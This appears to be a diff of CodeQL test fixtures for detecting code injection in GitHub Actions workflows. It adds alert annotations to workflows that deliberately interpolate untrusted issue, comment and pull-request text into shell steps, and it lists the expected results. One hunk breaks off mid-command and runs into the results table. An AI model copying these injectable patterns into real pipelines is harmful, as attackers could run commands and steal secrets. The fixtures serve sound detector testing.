@@ -19,6 +19,6 @@ jobs:
 id: extract_info
 shell: bash
 run: |
- echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT
- echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT
- echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT
+ echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium]
+ echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium]
+ echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml
index c1846b8f51e..3661cd885a4 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml
@@ -14,6 +14,6 @@ jobs:
 label_marker_start: '>>'
 label_marker_end: '<<'
- - name: Show parsed data JSON
+ - name: Show parsed data JSON # $ Source[actions/code-injection/critical]
 run: |
- echo ${{ steps.parse.outputs.payload }}
+ echo ${{ steps.parse.outputs.payload }} # $ Alert[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml
index 0bd666dc948..5cf1093c8bb 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml
@@ -9,5 +9,5 @@ jobs:
 - name: Issue Forms Body Parser
 id: parse
 uses: zentered/issue-forms-body-parser@v2.0.0
- - run: echo ${{ steps.parse.outputs.data }}
- - run: echo ${{ toJSON(steps.parse.outputs.data) }}
+ - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical]
+ - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml
index 8648d86983e..532ce731d10 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml
@@ -17,7 +17,7 @@ jobs:
 - name: Fetch the issue
 id: read_issue_body
 run:
- echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT
+ echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical]
 - name: Issue Forms Body Parser
 id: parse
@@ -25,5 +25,5 @@ jobs:
 with:
 body: ${{ steps.read_issue_body.outputs.body }}
- - run: echo ${{ steps.parse.outputs.data }}
- - run: echo ${{ toJSON(steps.parse.outputs.data) }}
+ - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical]
+ - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml
index e9ba77c0f93..86e76277f6e 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml 
@@ -38,7 +38,7 @@ jobs: persist-credentials: false ref: ${{ steps.get-sha.outputs.sha }} fetch-depth: 0 - - name: Get version + - name: Get version # $ Source[actions/code-injection/critical] id: get-version run: | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
